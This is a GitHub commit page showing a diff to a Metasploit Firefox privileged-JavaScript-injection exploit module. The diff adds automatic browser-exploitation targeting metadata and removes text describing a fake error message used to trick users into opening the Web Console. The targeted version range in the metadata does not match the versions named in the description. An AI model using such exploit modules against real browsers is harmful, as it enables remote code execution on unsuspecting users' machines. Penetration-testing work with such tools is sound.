File tree Expand file tree Collapse file tree 1 file changed +10
-6
lines changed
modules/exploits/multi/browser Expand file tree Collapse file tree 1 file changed +10
-6
lines changed Original file line number Diff line number Diff line change @@ -9,20 +9,24 @@ class Metasploit3 < Msf::Exploit::Remote
9
9
Rank = ExcellentRanking
10
10
11
11
include Msf ::Exploit ::Remote ::BrowserExploitServer
12
+ include Msf ::Exploit ::Remote ::BrowserAutopwn
12
13
include Msf ::Exploit ::Remote ::FirefoxPrivilegeEscalation
13
14
15
+ autopwn_info ( {
16
+ :ua_name => HttpClients ::FF ,
17
+ :ua_minver => "17.0" ,
18
+ :ua_maxver => "17.0.1" ,
19
+ :javascript => true ,
20
+ :rank => NormalRanking
21
+ } )
22
+
14
23
def initialize ( info = { } )
15
24
super ( update_info ( info ,
16
- 'Name' => 'Firefox toString User-Assisted Privileged Javascript Injection' ,
25
+ 'Name' => 'Firefox toString console.time Privileged Javascript Injection' ,
17
26
'Description' => %q{
18
27
This exploit gains remote code execution on Firefox 21-23 by abusing two separate
19
28
Javascript-related vulnerabilities to ultimately inject malicious Javascript code
20
29
into a context running with chrome:// privileges.
21
-
22
- For the exploit to work, the user must have the Web Console open. There is no way to
23
- trigger this from unprivileged Javascript, so for now a message is displayed telling
24
- the user that there is an error and to press cmd-option-k to open the Web Console,
25
- upon which the exploit will immediately run.
26
30
} ,
27
31
'License' => MSF_LICENSE ,
28
32
'Author' => [
You can’t perform that action at this time.
0 commit comments